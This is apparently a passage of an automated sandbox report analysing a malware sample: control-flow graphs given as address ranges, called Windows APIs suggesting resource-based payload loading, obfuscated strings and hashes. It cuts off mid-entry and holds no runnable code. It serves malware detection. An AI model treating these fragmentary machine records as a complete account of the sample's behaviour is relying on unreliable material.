4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 61d006 122->154 155 40234e call 61d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 61d006 135->152 153 402390 call 61d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                        APIs
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                        • _getenv.LIBCMT ref: 00401ABA
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                        • _malloc.LIBCMT ref: 00401EBA
                                                                                                                        • _memset.LIBCMT ref: 00401EDD
                                                                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4103914064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.4103897598.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103935605.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103996215.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                        • API String ID: 1430744539-2962942730
                                                                                                                        • Opcode ID: f33ec6517a8e462eea4e7ce496cce69d106849ef0d44fd50fc6c48668fb332a6
                                                                                                                        • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                        • Opcode Fuzzy Hash: f33ec6517a8e462eea4e7ce496cce69d106849ef0d44fd50fc6c48668fb332a6
                                                                                                                        • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Xbq$Xbq$Xbq$Xbq$Xbq$Xbq
                                                                                                                        • API String ID: 0-1317942629
                                                                                                                        • Opcode ID: 438330cdc7dac20dece8d4490092592c48f73d384593b4eec1ae9f2eb4d2be96
                                                                                                                        • Instruction ID: cb09bd5415192c120c1a0e2228b8a0fc79c1c242e2eed7cd0d0c53afb45ab312
                                                                                                                        • Opcode Fuzzy Hash: 438330cdc7dac20dece8d4490092592c48f73d384593b4eec1ae9f2eb4d2be96
                                                                                                                        • Instruction Fuzzy Hash: 56B22B396882C79FDB134FB49491298BBF1EF47A1871805E9C4D08F116E77A94CBCB62

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1264 21974e0-2197516 1265 219751e-2197524 1264->1265 1395 2197518 call 2196ea8 1264->1395 1396 2197518 call 2196d2f 1264->1396 1397 2197518 call 2197630 1264->1397 1398 2197518 call 21974e0 1264->1398 1266 2197574-2197578 1265->1266 1267 2197526-219752a 1265->1267 1268 219757a-2197589 1266->1268 1269 219758f-21975a3 1266->1269 1270 2197539-2197540 1267->1270 1271 219752c-2197531 1267->1271 1274 219758b-219758d 1268->1274 1275 21975b5-21975bf 1268->1275 1272 21975ab-21975b2 1269->1272 1400 21975a5 call 219a5f8 1269->1400 1401 21975a5 call 219a2f0 1269->1401 1402 21975a5 call 219a2e0 1269->1402 1276 2197541-219754d 1270->1276 1277 2197616-2197653 1270->1277 1271->1270 1274->1272 1278 21975c9-21975cd 1275->1278 1279 21975c1-21975c7 1275->1279 1276->1266 1280 219754f-2197553 1276->1280 1286 219765e-219767e 1277->1286 1287 2197655-219765b 1277->1287 1281 21975d5-219760f 1278->1281 1282 21975cf 1278->1282 1279->1281 1284 2197562-2197569 1280->1284 1285 2197555-219755a 1280->1285 1281->1277 1282->1281 1284->1277 1288 219756f-2197572 1284->1288 1285->1284 1294 2197680 1286->1294 1295 2197685-219768c 1286->1295 1287->1286 1288->1272 1296 2197a14-2197a1d 1294->1296 1297 219768e-2197699 1295->1297 1299 219769f-21976b2 1297->1299 1300 2197a25-2197a31 1297->1300 1304 21976c8-21976e3 1299->1304 1305 21976b4-21976c2 1299->1305 1306 2197a4c-2197a61 1300->1306 1307 2197a33-2197a3a 1300->1307 1312 21976e5-21976eb 1304->1312 1313 2197707-219770a 1304->1313 1305->1304 1311 219799c-21979a3 1305->1311 1314 2197a6a-2197a6e 1306->1314 1315 2197a63-2197a68 1306->1315 1307->1306 1311->1296 1317 21979a5-21979a7 1311->1317 1318 21976ed 1312->1318 1319 21976f4-21976f7 1312->1319 1320 2197710-2197713 1313->1320 1321 2197864-219786a 1313->1321 1316 2197a74-2197a75 1314->1316 1315->1316 1324 21979a9-21979ae 1317->1324 1325 21979b6-21979bc 1317->1325 1318->1319 1318->1321 1322 219772a-2197730 1318->1322 1323 2197956-2197959 1318->1323 1319->1322 1326 21976f9-21976fc 1319->1326 1320->1321 1328 2197719-219771f 1320->1328 1321->1323 1327 2197870-2197875 1321->1327 1329 2197732-2197734 1322->1329 1330 2197736-2197738 1322->1330 1331 219795f-2197965 1323->1331 1332 2197a20 1323->1332 1324->1325 1325->1300 1335 21979be-21979c3 1325->1335 1333 2197702 1326->1333 1334 2197796-219779c 1326->1334 1327->1323 1328->1321 1336 2197725 1328->1336 1338 2197742-219774b 1329->1338 1330->1338 1339 219798a-219798e 1331->1339 1340 2197967-219796f 1331->1340 1332->1300 1333->1323 1334->1323 1337 21977a2-21977a8 1334->1337 1341 2197a08-2197a0b 1335->1341 1342 21979c5-21979ca 1335->1342 1336->1323 1344 21977aa-21977ac 1337->1344 1345 21977ae-21977b0 1337->1345 1346 219774d-2197758 1338->1346 1347 219775e-2197786 1338->1347 1339->1311 1348 2197990-2197996 1339->1348 1340->1300 1343 2197975-2197984 1340->1343 1341->1332 1349 2197a0d-2197a12 1341->1349 1342->1332 1350 21979cc 1342->1350 1343->1304 1343->1339 1352 21977ba-21977d1 1344->1352 1345->1352 1346->1323 1346->1347 1370 219787a-21978b0 1347->1370 1371 219778c-2197791 1347->1371 1348->1297 1348->1311 1349->1296 1349->1317 1351 21979d3-21979d8 1350->1351 1353 21979fa-21979fc 1351->1353 1354 21979da-21979dc 1351->1354 1363 21977fc-2197823 1352->1363 1364 21977d3-21977ec 1352->1364 1353->1332 1361 21979fe-2197a01 1353->1361 1358 21979eb-21979f1 1354->1358 1359 21979de-21979e3 1354->1359 1358->1300 1362 21979f3-21979f8 1358->1362 1359->1358 1361->1341 1362->1353 1366 21979ce-21979d1 1362->1366 1363->1332 1375 2197829-219782c 1363->1375 1364->1370 1376 21977f2-21977f7 1364->1376 1366->1332 1366->1351 1377 21978bd-21978c5 1370->1377 1378 21978b2-21978b6 1370->1378 1371->1370 1375->1332 1379 2197832-219785b 1375->1379 1376->1370 1377->1332 1382 21978cb-21978d0 1377->1382 1380 21978b8-21978bb 1378->1380 1381 21978d5-21978d9 1378->1381 1379->1370 1394 219785d-2197862 1379->1394 1380->1377 1380->1381 1383 21978f8-21978fc 1381->1383 1384 21978db-21978e1 1381->1384 1382->1323 1387 21978fe-2197904 1383->1387 1388 2197906-2197925 call 2197c08 1383->1388 1384->1383 1386 21978e3-21978eb 1384->1386 1386->1332 1389 21978f1-21978f6 1386->1389 1387->1388 1391 219792b-219792f 1387->1391 1388->1391 1389->1323 1391->1323 1392 2197931-219794d 1391->1392 1392->1323 1394->1370 1395->1265 1396->1265 1397->1265 1398->1265 1400->1272 1401->1272 1402->1272
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                                                        • API String ID: 0-2525668591
                                                                                                                        • Opcode ID: 85658d47c09bf00e63ca153a3667166a420f4036f27ebf13dbc4bf6ebe5789a6
                                                                                                                        • Instruction ID: cacd98783b2b077da981e1fc04161ef3f9267e69f9a6c840b92f6845abecf5e3
                                                                                                                        • Opcode Fuzzy Hash: 85658d47c09bf00e63ca153a3667166a420f4036f27ebf13dbc4bf6ebe5789a6
                                                                                                                        • Instruction Fuzzy Hash: F9024BB0A50219DFDF18CF69C884AAEFBF2FF88314F158469E415AB2A5D730D952CB50

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1518 219c4e0-219c4f3 1520 219c4f9-219c502 1518->1520 1521 219c632-219c639 1518->1521 1522 219c508-219c50c 1520->1522 1523 219c63c 1520->1523 1524 219c50e 1522->1524 1525 219c526-219c52d 1522->1525 1527 219c641-219c668 1523->1527 1528 219c511-219c51c 1524->1528 1525->1521 1526 219c533-219c540 1525->1526 1526->1521 1532 219c546-219c559 1526->1532 1533 219c66a-219c682 1527->1533 1534 219c694 1527->1534 1528->1523 1529 219c522-219c524 1528->1529 1529->1525 1529->1528 1535 219c55b 1532->1535 1536 219c55e-219c566 1532->1536 1546 219c68b-219c68e 1533->1546 1547 219c684-219c689 1533->1547 1537 219c696-219c69a 1534->1537 1535->1536 1538 219c568-219c56e 1536->1538 1539 219c5d3-219c5d5 1536->1539 1538->1539 1542 219c570-219c576 1538->1542 1539->1521 1541 219c5d7-219c5dd 1539->1541 1541->1521 1544 219c5df-219c5e9 1541->1544 1542->1527 1545 219c57c-219c594 1542->1545 1544->1527 1548 219c5eb-219c603 1544->1548 1558 219c5c1-219c5c4 1545->1558 1559 219c596-219c59c 1545->1559 1549 219c69b-219c6d8 1546->1549 1550 219c690-219c692 1546->1550 1547->1537 1563 219c628-219c62b 1548->1563 1564 219c605-219c60b 1548->1564 1555 219c6da 1549->1555 1556 219c6df-219c7bf call 21946a8 call 21941c8 1549->1556 1550->1533 1550->1534 1555->1556 1581 219c7c1 1556->1581 1582 219c7c6-219c7e7 call 2195b68 1556->1582 1558->1523 1561 219c5c6-219c5c9 1558->1561 1559->1527 1560 219c5a2-219c5b6 1559->1560 1560->1527 1571 219c5bc 1560->1571 1561->1523 1567 219c5cb-219c5d1 1561->1567 1563->1523 1566 219c62d-219c630 1563->1566 1564->1527 1565 219c60d-219c621 1564->1565 1565->1527 1572 219c623 1565->1572 1566->1521 1566->1544 1567->1538 1567->1539 1571->1558 1572->1563 1581->1582 1584 219c7ec-219c7f7 1582->1584 1585 219c7f9 1584->1585 1586 219c7fe-219c802 1584->1586 1585->1586 1587 219c804-219c805 1586->1587 1588 219c807-219c80e 1586->1588 1591 219c826-219c86a 1587->1591 1589 219c810 1588->1589 1590 219c815-219c823 1588->1590 1589->1590 1590->1591 1595 219c8d0-219c8e7 1591->1595 1597 219c8e9-219c90e 1595->1597 1598 219c86c-219c882 1595->1598 1605 219c910-219c925 1597->1605 1606 219c926 1597->1606 1602 219c8ac 1598->1602 1603 219c884-219c890 1598->1603 1604 219c8b2-219c8cf 1602->1604 1607 219c89a-219c8a0 1603->1607 1608 219c892-219c898 1603->1608 1604->1595 1605->1606 1612 219c927 1606->1612 1609 219c8aa 1607->1609 1608->1609 1609->1604 1612->1612
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                        • API String ID: 0-1487592376
                                                                                                                        • Opcode ID: 82ff6aca93e6ee18a404b6db72b489ef243a3353ba9316636f23f7ce02a5ac10
                                                                                                                        • Instruction ID: f05c873326055a30f93a655bb930650ff174196ec77696c5c7a732446686c156
                                                                                                                        • Opcode Fuzzy Hash: 82ff6aca93e6ee18a404b6db72b489ef243a3353ba9316636f23f7ce02a5ac10
                                                                                                                        • Instruction Fuzzy Hash: 67E10A70E40218DFDF14CFA9C994A9DBBB2BF49310F15906AE859AB361DB31E841CF90

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1614 219586f-21958b0 1615 21958b2 1614->1615 1616 21958b7-2195997 call 21946a8 call 21941c8 1614->1616 1615->1616 1627 2195999 1616->1627 1628 219599e-21959bc 1616->1628 1627->1628 1658 21959bf call 2195b68 1628->1658 1659 21959bf call 2195b5b 1628->1659 1629 21959c5-21959d0 1630 21959d2 1629->1630 1631 21959d7-21959db 1629->1631 1630->1631 1632 21959dd-21959de 1631->1632 1633 21959e0-21959e7 1631->1633 1634 21959ff-2195a43 1632->1634 1635 21959e9 1633->1635 1636 21959ee-21959fc 1633->1636 1640 2195aa9-2195ac0 1634->1640 1635->1636 1636->1634 1642 2195ac2-2195ae7 1640->1642 1643 2195a45-2195a5b 1640->1643 1650 2195ae9-2195afe 1642->1650 1651 2195aff 1642->1651 1647 2195a5d-2195a69 1643->1647 1648 2195a85 1643->1648 1652 2195a6b-2195a71 1647->1652 1653 2195a73-2195a79 1647->1653 1649 2195a8b-2195aa8 1648->1649 1649->1640 1650->1651 1654 2195a83 1652->1654 1653->1654 1654->1649 1658->1629 1659->1629
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                        • API String ID: 0-1487592376
                                                                                                                        • Opcode ID: f479339a9b9a7e17b2372d4549d99babe8f4b1bd526a1efaf23184d023b26c98
                                                                                                                        • Instruction ID: 407c91ebeffe3fbf48c03aa0b396b4ab7e48cf5c150b1e283e9d781302f0ba0e
                                                                                                                        • Opcode Fuzzy Hash: f479339a9b9a7e17b2372d4549d99babe8f4b1bd526a1efaf23184d023b26c98
                                                                                                                        • Instruction Fuzzy Hash: FE91F674E00208DFDB14DFAAD894A9DBBF2BF89300F14C069E819AB365DB349985CF50

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1750 219d7b8-219d7e8 1751 219d7ea 1750->1751 1752 219d7ef-219d8cf call 21946a8 call 21941c8 1750->1752 1751->1752 1763 219d8d1 1752->1763 1764 219d8d6-219d8f7 call 2195b68 1752->1764 1763->1764 1766 219d8fc-219d907 1764->1766 1767 219d909 1766->1767 1768 219d90e-219d912 1766->1768 1767->1768 1769 219d914-219d915 1768->1769 1770 219d917-219d91e 1768->1770 1771 219d936-219d97a 1769->1771 1772 219d920 1770->1772 1773 219d925-219d933 1770->1773 1777 219d9e0-219d9f7 1771->1777 1772->1773 1773->1771 1779 219d9f9-219da1e 1777->1779 1780 219d97c-219d992 1777->1780 1786 219da20-219da35 1779->1786 1787 219da36 1779->1787 1784 219d9bc 1780->1784 1785 219d994-219d9a0 1780->1785 1790 219d9c2-219d9df 1784->1790 1788 219d9aa-219d9b0 1785->1788 1789 219d9a2-219d9a8 1785->1789 1786->1787 1791 219d9ba 1788->1791 1789->1791 1790->1777 1791->1790
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                        • API String ID: 0-1487592376
                                                                                                                        • Opcode ID: 4d3f75859eadbfe0e0a57b84182b1bcfad4e2557f78cd0e4387eb4e478cd0e68
                                                                                                                        • Instruction ID: ae1b2ff34fd90a8e8717e253d1de93e6f9618fc9c41e8568702be5ac0a50dc8a
                                                                                                                        • Opcode Fuzzy Hash: 4d3f75859eadbfe0e0a57b84182b1bcfad4e2557f78cd0e4387eb4e478cd0e68
                                                                                                                        • Instruction Fuzzy Hash: BC81C374E40218CFDB18DFAAD994A9DBBF2BF88300F14D069E419AB365DB349981CF10

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1660 219c980-219c9b0 1661 219c9b2 1660->1661 1662 219c9b7-219ca97 call 21946a8 call 21941c8 1660->1662 1661->1662 1673 219ca99 1662->1673 1674 219ca9e-219cabf call 2195b68 1662->1674 1673->1674 1676 219cac4-219cacf 1674->1676 1677 219cad1 1676->1677 1678 219cad6-219cada 1676->1678 1677->1678 1679 219cadc-219cadd 1678->1679 1680 219cadf-219cae6 1678->1680 1681 219cafe-219cb42 1679->1681 1682 219cae8 1680->1682 1683 219caed-219cafb 1680->1683 1687 219cba8-219cbbf 1681->1687 1682->1683 1683->1681 1689 219cbc1-219cbe6 1687->1689 1690 219cb44-219cb5a 1687->1690 1697 219cbe8-219cbfd 1689->1697 1698 219cbfe 1689->1698 1694 219cb5c-219cb68 1690->1694 1695 219cb84 1690->1695 1699 219cb6a-219cb70 1694->1699 1700 219cb72-219cb78 1694->1700 1696 219cb8a-219cba7 1695->1696 1696->1687 1697->1698 1701 219cb82 1699->1701 1700->1701 1701->1696
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                        • API String ID: 0-1487592376
                                                                                                                        • Opcode ID: c7620d727b940a053400c669481faf9c388f7a411496b3735014150fb304da8e
                                                                                                                        • Instruction ID: e6b1ba380b7f8e5f053615fe2e91602b72f99dc4d05266bd1fde8a04026fdf7a
                                                                                                                        • Opcode Fuzzy Hash: c7620d727b940a053400c669481faf9c388f7a411496b3735014150fb304da8e
                                                                                                                        • Instruction Fuzzy Hash: BD81C674E40218CFDB18DFA9D884A9DBBF2BF88300F14D06AE459AB365DB345945CF50

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1705 219cc58-219cc88 1706 219cc8a 1705->1706 1707 219cc8f-219cd6f call 21946a8 call 21941c8 1705->1707 1706->1707 1718 219cd71 1707->1718 1719 219cd76-219cd97 call 2195b68 1707->1719 1718->1719 1721 219cd9c-219cda7 1719->1721 1722 219cda9 1721->1722 1723 219cdae-219cdb2 1721->1723 1722->1723 1724 219cdb4-219cdb5 1723->1724 1725 219cdb7-219cdbe 1723->1725 1726 219cdd6-219ce1a 1724->1726 1727 219cdc0 1725->1727 1728 219cdc5-219cdd3 1725->1728 1732 219ce80-219ce97 1726->1732 1727->1728 1728->1726 1734 219ce99-219cebe 1732->1734 1735 219ce1c-219ce32 1732->1735 1741 219cec0-219ced5 1734->1741 1742 219ced6 1734->1742 1739 219ce5c 1735->1739 1740 219ce34-219ce40 1735->1740 1745 219ce62-219ce7f 1739->1745 1743 219ce4a-219ce50 1740->1743 1744 219ce42-219ce48 1740->1744 1741->1742 1746 219ce5a 1743->1746 1744->1746 1745->1732 1746->1745
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                        • API String ID: 0-1487592376
                                                                                                                        • Opcode ID: 78267b9cb1eb4f3a0047eee15fb564e38791608df7f4a0acc899fba5bd9d0c69
                                                                                                                        • Instruction ID: 64a613cb9b9b433996ca6b9a893e53c05eb6329f1b6ad27e411fb47e1b7f3610
                                                                                                                        • Opcode Fuzzy Hash: 78267b9cb1eb4f3a0047eee15fb564e38791608df7f4a0acc899fba5bd9d0c69
                                                                                                                        • Instruction Fuzzy Hash: FC81C674E40218CFDB14DFA9D994A9DBBF2BF88300F14D06AE459AB365DB349941CF50

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1795 219d20b-219d238 1796 219d23a 1795->1796 1797 219d23f-219d31f call 21946a8 call 21941c8 1795->1797 1796->1797 1808 219d321 1797->1808 1809 219d326-219d347 call 2195b68 1797->1809 1808->1809 1811 219d34c-219d357 1809->1811 1812 219d359 1811->1812 1813 219d35e-219d362 1811->1813 1812->1813 1814 219d364-219d365 1813->1814 1815 219d367-219d36e 1813->1815 1816 219d386-219d3ca 1814->1816 1817 219d370 1815->1817 1818 219d375-219d383 1815->1818 1822 219d430-219d447 1816->1822 1817->1818 1818->1816 1824 219d449-219d46e 1822->1824 1825 219d3cc-219d3e2 1822->1825 1831 219d470-219d485 1824->1831 1832 219d486 1824->1832 1829 219d40c 1825->1829 1830 219d3e4-219d3f0 1825->1830 1835 219d412-219d42f 1829->1835 1833 219d3fa-219d400 1830->1833 1834 219d3f2-219d3f8 1830->1834 1831->1832 1836 219d40a 1833->1836 1834->1836 1835->1822 1836->1835
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                        • API String ID: 0-1487592376
                                                                                                                        • Opcode ID: 21d93c6c0b7dd691fbcfd8edbd1bf7851c8ceed16c801168b2f1db14375c92e8
                                                                                                                        • Instruction ID: 58dabd3aee7088c466fdf19a0c4b6df04df473cf13df7004b690b92f42fda7a3
                                                                                                                        • Opcode Fuzzy Hash: 21d93c6c0b7dd691fbcfd8edbd1bf7851c8ceed16c801168b2f1db14375c92e8
                                                                                                                        • Instruction Fuzzy Hash: 3881C574E40218CFDB58DFAAD984A9DBBF2BF89300F14D069E419AB365DB349981CF10
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                        • API String ID: 0-1487592376
                                                                                                                        • Opcode ID: 7acb0a6e6507223456f1afefc53c96352736a78c08ec51ba0a8db9193fb733bc
                                                                                                                        • Instruction ID: 6705b5053a91e929cac17e6c9edc87da427eb5883bd771bb5710dec5c1f997f0
                                                                                                                        • Opcode Fuzzy Hash: 7acb0a6e6507223456f1afefc53c96352736a78c08ec51ba0a8db9193fb733bc
                                                                                                                        • Instruction Fuzzy Hash: 0E81B374E40218CFDB18DFAAD984A9DBBF2BF88300F14D069E419AB365DB359985CF50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                        • API String ID: 0-1487592376
                                                                                                                        • Opcode ID: 94eef9432dc2c89b728618895607659f99be282f6c19c417d0d396609e2d6753
                                                                                                                        • Instruction ID: e8d255101b80b8b63c2df33bfd966108418dc96be8be468ac3bd08d4bed43146
                                                                                                                        • Opcode Fuzzy Hash: 94eef9432dc2c89b728618895607659f99be282f6c19c417d0d396609e2d6753
                                                                                                                        • Instruction Fuzzy Hash: 2381C474E40218CFDB58DFAAD994A9DBBF2BF88300F14D069E419AB365DB349981CF50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                                                        • API String ID: 0-183542557
                                                                                                                        • Opcode ID: a0b46b30b01e7779251413ffa41f2c3b63ff79d6709f0012983c2553068ad21e
                                                                                                                        • Instruction ID: 3672bcfd83e6f86660fa3eff4e8016339ca19dc0153fd1ba1ed0dcd6adc03f83
                                                                                                                        • Opcode Fuzzy Hash: a0b46b30b01e7779251413ffa41f2c3b63ff79d6709f0012983c2553068ad21e
                                                                                                                        • Instruction Fuzzy Hash: 19A28D71A40209DFCF15CF68C484AAEBBB2FF88304F158569E816DB365D731E989CB91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
